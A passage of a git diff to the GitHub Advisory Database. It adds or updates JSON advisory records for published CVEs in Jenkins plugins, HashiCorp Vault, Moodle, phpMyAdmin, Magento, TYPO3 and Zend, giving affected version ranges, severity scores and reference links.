"cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:43:47Z", + "nvd_published_at": "2018-01-26T02:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json b/advisories/github-reviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json new file mode 100644 index 0000000000000..97a0227f1a8bf --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56ff-m6pv-8594", + "modified": "2024-01-30T22:03:52Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003079" + ], + "summary": "Missing permission check in Jenkins VMware Lab Manager Slaves Plugin", + "details": "A missing permission check in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:labmanager" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.2.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003079" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:03:52Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json b/advisories/github-reviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json new file mode 100644 index 0000000000000..aa05c2517338f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56gj-927p-mfph", + "modified": "2024-01-30T21:19:12Z", + "published": "2022-05-24T16:55:59Z", + "aliases": [ + "CVE-2019-10397" + ], + "summary": "Jenkins Aqua Security Serverless Scanner Plugin showed plain text password in job configuration form fields ", + "details": "Jenkins Aqua Security Serverless Scanner Plugin 1.0.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "org.jenkins-ci.plugins:aqua-serverless" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10397" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-12/#SECURTY-1509" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/12/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:19:12Z", + "nvd_published_at": "2019-09-12T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json b/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json index 1387b741ec50b..bcf575c261d2e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json +++ b/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8092" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8092.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json b/advisories/github-reviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json new file mode 100644 index 0000000000000..38b40445c3e77 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57gg-cj55-q5g2", + "modified": "2024-02-01T21:49:26Z", + "published": "2022-05-24T22:01:23Z", + "aliases": [ + "CVE-2020-25816" + ], + "summary": "Token leases could outlive their TTL in HashiCorp Vault", + "details": "HashiCorp Vault and Vault Enterprise 1.0 before 1.5.4 have Incorrect Access Control.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "fixed": "1.5.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25816" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/pull/10020/commits/f192878110fe93eb13da914b2bee28caa7866a29" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#147" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#154" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/vault" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:49:26Z", + "nvd_published_at": "2020-09-30T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json b/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json index 7b50e169f3619..c9188fe644541 100644 --- a/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json +++ b/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://docs.silverstripe.org/en/4/changelogs/4.6.0/?_ga=2.170693920.105499209.1689776417-708940272.1689776417" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2020-6165.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2020-6165" diff --git a/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json b/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json index 178a09a79c446..f89e3ee6c265c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json +++ b/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json @@ -117,10 +117,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.2.2" - } + ] } ], "references": [ @@ -128,6 +125,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3941" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-3941.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/" + }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00028.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json b/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json index 355e51513efff..1ce7231a3da74 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json +++ b/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json @@ -18,17 +18,36 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework" + "name": "zendframework/zend-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0.0beta4" }, { - "fixed": "1.12.12" + "fixed": "2.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0rc1" + }, + { + "fixed": "2.4.1" } ] } @@ -71,6 +90,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zendframework1" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.12" + } + ] + } + ] } ], "references": [ @@ -79,12 +136,24 @@ "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3154" }, { - "type": "PACKAGE", - "url": "https://github.com/zendframework/zendframework" + "type": "WEB", + "url": "https://framework.zend.com/security/advisory/ZF2015-04" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-http/CVE-2015-3154.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-3154.yaml" }, { "type": "WEB", - "url": "http://framework.zend.com/security/advisory/ZF2015-04" + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2015-3154.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/zendframework/zendframework" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json b/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json index 3abe26ec70a58..5b93897ba0bf9 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json +++ b/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7951" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7951.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json b/advisories/github-reviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json new file mode 100644 index 0000000000000..700fb23764488 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json @@ -0,0 +1,120 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jph-mvfm-r27p", + "modified": "2024-01-29T02:52:10Z", + "published": "2022-05-13T01:12:43Z", + "aliases": [ + "CVE-2015-0218" + ], + "summary": "Moodle cross-site request forgery (CSRF) vulnerability", + "details": "Cross-site request forgery (CSRF) vulnerability in auth/shibboleth/logout.php in Moodle through 2.5.9, 2.6.x before 2.6.7, 2.7.x before 2.7.4, and 2.8.x before 2.8.2 allows remote attackers to hijack the authentication of arbitrary users for requests that trigger a logout.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0218" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/371d58d70d4ef866f35e33ea6898007112bfe654" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/693918c30e6b7c95dddd9c5973f98d98342a59d9" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/b82b4c562b705ea8f11893d9126889bb696b9612" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/fb60e23a67931eeba8fc9aacf3cc838e462f21f2" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moodle/moodle" + }, + { + "type": "WEB", + "url": "https://moodle.org/mod/forum/discuss.php?d=278618" + }, + { + "type": "WEB", + "url": "http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-47964" + }, + { + "type": "WEB", + "url": "http://openwall.com/lists/oss-security/2015/01/19/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T02:52:10Z", + "nvd_published_at": "2015-06-01T19:59:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json b/advisories/github-reviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json new file mode 100644 index 0000000000000..c7534aa53e7c1 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pjj-7m4p-wfh2", + "modified": "2024-02-07T22:40:09Z", + "published": "2022-05-17T02:04:28Z", + "aliases": [ + "CVE-2010-4338" + ], + "summary": "ocrodjvu is vulnerable to Arbitrary File Modification via symlink attack", + "details": "ocrodjvu 0.4.6-1 on Debian GNU/Linux allows local users to modify arbitrary files via a symlink attack on temporary files that are generated when Cuneiform is invoked as the OCR engine.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ocrodjvu" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.4.6-1" + }, + { + "fixed": "0.4.6-2" + } + ] + } + ], + "versions": [ + "0.4.6-1" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4338" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64892" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jwilk-archive/ocrodjvu" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229160520/http://www.securityfocus.com/bid/45234" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598134" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:40:09Z", + "nvd_published_at": "2011-01-20T19:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json b/advisories/github-reviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json new file mode 100644 index 0000000000000..b2a86ab871d89 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json @@ -0,0 +1,149 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pvv-f8h3-gw96", + "modified": "2024-02-08T22:02:35Z", + "published": "2022-05-02T03:47:43Z", + "aliases": [ + "CVE-2009-3696" + ], + "summary": "phpMyAdmin Cross-site Scripting In MySQL Table Name", + "details": "Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyadmin/phpmyadmin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.11.0" + }, + { + "fixed": "2.11.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyadmin/phpmyadmin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3696" + }, + { + "type": "WEB", + "url": "https://github.com/phpmyadmin/phpmyadmin/commit/212daad0c082dfb853e3a4098838781a96b2ce1f" + }, + { + "type": "WEB", + "url": "https://github.com/phpmyadmin/phpmyadmin/commit/8ec5434999724f61d7df1f9b0b13545274c78b1e" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=528769" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53742" + }, + { + "type": "PACKAGE", + "url": "https://github.com/phpmyadmin/phpmyadmin" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228173112/http://www.securityfocus.com/bid/36658" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00467.html" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00490.html" + }, + { + "type": "WEB", + "url": "http://bugs.gentoo.org/show_bug.cgi?id=288899" + }, + { + "type": "WEB", + "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/2.11.9.6/phpMyAdmin-2.11.9.6-notes.html" + }, + { + "type": "WEB", + "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.2.2.1/phpMyAdmin-3.2.2.1-notes.html" + }, + { + "type": "WEB", + "url": "http://freshmeat.net/projects/phpmyadmin/releases/306667" + }, + { + "type": "WEB", + "url": "http://freshmeat.net/projects/phpmyadmin/releases/306669" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125553728512853&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125561979001460&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/extensions/repository/view/phpmyadmin/4.5.0/" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-015/" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:274" + }, + { + "type": "WEB", + "url": "http://www.phpmyadmin.net/home_page/security/PMASA-2009-6.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:02:34Z", + "nvd_published_at": "2009-10-16T16:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json b/advisories/github-reviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json new file mode 100644 index 0000000000000..504456a09b9eb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5q7j-8hpc-4848", + "modified": "2024-01-30T22:11:16Z", + "published": "2022-05-14T01:38:17Z", + "aliases": [ + "CVE-2018-1000421" + ], + "summary": "Server-side request forgery vulnerability in Jenkins Mesos Plugin", + "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to initiate a test connection to an attacker-specified Mesos server with attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mesos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.17.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000421" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(2)" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:11:16Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json b/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json index bd810f537a5be..8860f21238932 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json +++ b/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json @@ -29,10 +29,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.2.2" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.2.0" + }, + { + "fixed": "6.2.6" + } + ] + } + ] } ], "references": [ @@ -44,10 +60,22 @@ "type": "WEB", "url": "https://github.com/openid/php-openid/commit/625c16bb28bb120d262b3f19f89c2c06cb9b0da9" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/openid/php-openid/CVE-2013-4701.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2013-4701.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/openid/php-openid" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2014-002" + }, { "type": "WEB", "url": "http://jvn.jp/en/jp/JVN24713981/index.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json b/advisories/github-reviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json new file mode 100644 index 0000000000000..d14106e16d756 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5v2j-w677-j4mp", + "modified": "2024-01-30T22:26:51Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003027" + ], + "summary": "SSRF vulnerability due to missing permission check in Jenkins OctopusDeploy Plugin ", + "details": "A server-side request forgery vulnerability exists in Jenkins OctopusDeploy Plugin 1.8.1 and earlier in OctopusDeployPlugin.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified URL and obtain the HTTP response code if successful, and exception error message otherwise.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins.octopusdeploy:octopusdeploy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.8.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003027" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-817" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:26:51Z", + "nvd_published_at": "2019-02-20T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json b/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json index 1b932388169ab..ec6035e568a18 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json +++ b/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8122" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8122.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json b/advisories/github-reviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json new file mode 100644 index 0000000000000..4664c21993c7d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63cj-3r94-234v", + "modified": "2024-01-30T22:36:03Z", + "published": "2022-05-17T00:29:01Z", + "aliases": [ + "CVE-2017-1000103" + ], + "summary": "Persistent XSS vulnerability in Jenkins DRY Plugin", + "details": "The custom Details view of the Static Analysis Utilities based DRY Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:dry" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.49" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.48" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000103" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/101061" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:03Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json 